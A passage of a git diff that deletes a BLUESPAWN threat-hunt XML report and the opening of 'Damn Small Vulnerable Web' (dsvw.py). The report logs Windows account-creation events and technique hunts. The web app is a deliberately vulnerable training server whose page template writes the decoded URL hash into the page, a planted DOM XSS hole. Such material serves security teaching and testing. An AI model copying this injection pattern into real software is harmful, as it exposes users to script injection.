-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jane</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4099</recordid>
-            <time>2020-06-11 22:04:51.911812900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.9118129Z'/&gt;&lt;EventRecordID&gt;4099&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Albert&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1009&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Albert&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Albert</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4093</recordid>
-            <time>2020-06-11 22:04:51.823811400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.8238114Z'/&gt;&lt;EventRecordID&gt;4093&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jason&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1008&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jason&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jason</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4087</recordid>
-            <time>2020-06-11 22:04:51.745753600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.7457536Z'/&gt;&lt;EventRecordID&gt;4087&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ralph&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1007&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ralph&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ralph</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4081</recordid>
-            <time>2020-06-11 22:04:51.668192700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.6681927Z'/&gt;&lt;EventRecordID&gt;4081&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sandra&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1006&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sandra&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sandra</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4075</recordid>
-            <time>2020-06-11 22:04:51.584481200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.5844812Z'/&gt;&lt;EventRecordID&gt;4075&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jacqueline&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1005&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jacqueline&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jacqueline</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4069</recordid>
-            <time>2020-06-11 22:04:51.502859300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.5028593Z'/&gt;&lt;EventRecordID&gt;4069&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Frances&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1004&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Frances&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Frances</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4063</recordid>
-            <time>2020-06-11 22:04:51.421513200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.4215132Z'/&gt;&lt;EventRecordID&gt;4063&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christian&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1003&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christian&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christian</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4057</recordid>
-            <time>2020-06-11 22:04:51.316709000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.3167090Z'/&gt;&lt;EventRecordID&gt;4057&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Robert&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1002&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Robert&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Robert</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="12" time="132367113252310000" datetime="2020-06-15 16:15:25.23100Z">
-        <name>T1138 - Application Shimming</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="12" time="132367113252310000" datetime="2020-06-15 16:15:25.23100Z">
-        <name>T1182 - AppCert DLLs</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="12" time="132367113252460000" datetime="2020-06-15 16:15:25.24600Z">
-        <name>T1183 - Image File Execution Options</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="4" datasources="40" tactics="16" time="132367113252460000" datetime="2020-06-15 16:15:25.24600Z">
-        <name>T1484 - Group Policy Modification</name>
-    </hunt>
-</bluespawn>
diff --git a/dsvw.py b/dsvw.py
deleted file mode 100644
index adba6135..00000000
--- a/dsvw.py
+++ /dev/null
@@ -1,98 +0,0 @@
-#!/usr/bin/env python
-import html, http.client, http.server, io, json, os, pickle, random, re, socket, socketserver, sqlite3, string, sys, subprocess, time, traceback, urllib.parse, urllib.request, xml.etree.ElementTree  # Python 3 required
-try:
-    import lxml.etree
-except ImportError:
-    print("[!] please install 'python-lxml' to (also) get access to XML vulnerabilities (e.g. '%s')\n" % ("apt-get install python-lxml" if os.name != "nt" else "https://pypi.python.org/pypi/lxml"))
-
-NAME, VERSION, GITHUB, AUTHOR, LICENSE = "Damn Small Vulnerable Web (DSVW) < 100 LoC (Lines of Code)", "0.2b", "https://github.com/stamparm/DSVW", "Miroslav Stampar (@stamparm)", "Unlicense (public domain)"
-LISTEN_ADDRESS, LISTEN_PORT = "0.0.0.0", 65412
-HTML_PREFIX, HTML_POSTFIX = "<!DOCTYPE html>\n<html>\n<head>\n<style>a {font-weight: bold; text-decoration: none; visited: blue; color: blue;} ul {display: inline-block;} .disabled {text-decoration: line-through; color: gray} .disabled a {visited: gray; color: gray; pointer-events: none; cursor: default} table {border-collapse: collapse; margin: 12px; border: 2px solid black} th, td {border: 1px solid black; padding: 3px} span {font-size: larger; font-weight: bold}</style>\n<title>%s</title>\n</head>\n<body style='font: 12px monospace'>\n<script>function process(data) {alert(\"Surname(s) from JSON results: \" + Object.keys(data).map(function(k) {return data[k]}));}; var index=document.location.hash.indexOf('lang='); if (index != -1) document.write('<div style=\"position: absolute; top: 5px; right: 5px;\">Chosen language: <b>' + decodeURIComponent(document.location.hash.substring(index + 5)) + '</b></div>');</script>\n" % html.escape(NAME), "<div style=\"position: fixed; bottom: 5px; text-align: center; width: 100%%;\">Powered by <a href=\"%s\" style=\"font-weight: bold; text-decoration: none; visited: blue; color: blue\" target=\"_blank\">%s</a> (v<b>%s</b>)</div>\n</body>\n</html>" % (GITHUB, re.search(r"\(([^)]+)", NAME).group(1), VERSION)
